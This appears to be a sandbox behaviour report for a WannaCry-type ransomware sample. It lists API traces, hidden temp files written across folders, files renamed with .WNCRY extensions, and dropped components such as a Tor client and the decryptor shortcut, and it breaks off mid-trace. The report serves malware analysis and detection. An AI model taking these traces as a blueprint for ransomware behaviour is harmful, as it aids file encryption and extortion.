description explorer.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 12972339200
free_bytes_available: 12972339200
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 12737273856
free_bytes_available: 12737273856
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 12525162496
free_bytes_available: 12525162496
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 12075646976
free_bytes_available: 12075646976
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11862364160
free_bytes_available: 11862364160
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11904839680
free_bytes_available: 11904839680
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11695083520
free_bytes_available: 11695083520
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11485577216
free_bytes_available: 11485577216
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11558100992
free_bytes_available: 11558100992
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 11348238336
free_bytes_available: 11348238336
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 12737413120
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\pt_PT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\~SDB5F.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\cast_setup\cast_app.js.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hu\~SDA64.tmp
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\it
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\cast_setup\chromecast_logo_grey.png.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\it\~SDA76.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sk\~SDAA2.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\de
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\id
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\zu\~SDDD5.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\es_419
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ka\~SDE67.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ro\~SD1006.tmp
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\zh_CN\~SD12E3.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ro
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\~SD857.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\id\~SDD1D.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ko
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\kn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\km
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\ja
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ar
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ka
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\fil
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\lt\~SDA79.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ca\~SDF8D.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\fi\~SDFB7.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\zh_CN\~SDACA.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\tr\~SDF2F.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ca
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ms\~SD1366.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\sr
file C:\Users\test22\Documents\readme.xls
file C:\Users\test22\Documents\WmXfDlmbAt.doc
file C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm
file C:\Users\test22\Documents\readme.doc
file C:\Users\test22\Documents\ONyeiyAHXnG.docx
file C:\Users\test22\Documents\VyTyVAoqvtpE.docx
file C:\Users\test22\Documents\vSjjFAKhemtn.doc
file C:\Users\test22\Documents\UvxreHDTdz.docm
file C:\Users\test22\Documents\gQkWZLHqeA.docm
file C:\Users\test22\Documents\axTZwDBeUngqBG.ppt
file C:\Users\test22\Documents\JDHeJjBWHuxqp.doc
file C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm
file C:\Users\test22\Documents\sByekmDWYN.docm
file C:\Users\test22\Documents\FSRTltbNCjG.docx
file C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm
file C:\Users\test22\Documents\cXMLMLMlMJidCP.doc
file C:\Users\test22\Documents\tLwQFCBpzg.ppt
file C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm
file C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc
file C:\Users\test22\Documents\KIprYLexEf.doc
file C:\Users\test22\Documents\FOwRatdvSt.docm
file C:\Users\test22\AppData\Local\Temp\36401687182996.bat
file C:\Users\test22\AppData\Local\Temp\taskdl.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\tor.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libeay32.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
file C:\Users\test22\AppData\Local\Temp\m.vbs
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
file C:\Users\test22\AppData\Local\Temp\taskse.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\zlib1.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000140
filepath: C:\Users\test22\Desktop\~SDF83A.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\Desktop\~SDF83A.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000144
filepath: C:\Users\test22\Documents\~SDF85B.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\Documents\~SDF85B.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\Users\Default\Desktop\~SDFAAD.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\Default\Desktop\~SDFAAD.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\Users\Default User\Desktop\~SDFAAE.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\Default User\Desktop\~SDFAAE.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\Users\Public\Desktop\~SDFAAF.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\Public\Desktop\~SDFAAF.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000154
filepath: C:\Users\Default\Documents\~SDFAB0.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\Default\Documents\~SDFAB0.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000154
filepath: C:\Users\Default User\Documents\~SDFAC1.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\Default User\Documents\~SDFAC1.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000154
filepath: C:\Users\Public\Documents\~SDFAC2.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\Public\Documents\~SDFAC2.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\~SDFAC3.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\~SDFAC3.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\$Recycle.Bin\~SDFAD4.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\$Recycle.Bin\~SDFAD4.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\$Recycle.Bin\S-1-5-21-3832866432-4053218753-3017428901-1001\~SDFAD5.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\$Recycle.Bin\S-1-5-21-3832866432-4053218753-3017428901-1001\~SDFAD5.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\GPKI\~SDFAD6.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\GPKI\~SDFAD6.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\~SDFAD7.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\~SDFAD7.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\~SDFAE7.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\~SDFAE7.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\~SDFAE8.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\~SDFAE8.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\~SDFAE9.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\~SDFAE9.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\~SDFAEA.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\~SDFAEA.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\~SDFAEB.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\~SDFAEB.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\~SDFAEC.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\~SDFAEC.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\~SDFAFD.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\~SDFAFD.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\~SDFAFE.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\~SDFAFE.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\~SDFAFF.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\~SDFAFF.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\~SDFB00.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\~SDFB00.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\~SDFB01.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\~SDFB01.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\~SDFB12.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\~SDFB12.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0044-0412-0000-0000000FF1CE}-C\~SDFB13.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0044-0412-0000-0000000FF1CE}-C\~SDFB13.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\~SDFB14.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\~SDFB14.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\1042\~SDFB15.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\1042\~SDFB15.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-00A1-0412-0000-0000000FF1CE}-C\~SDFB16.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
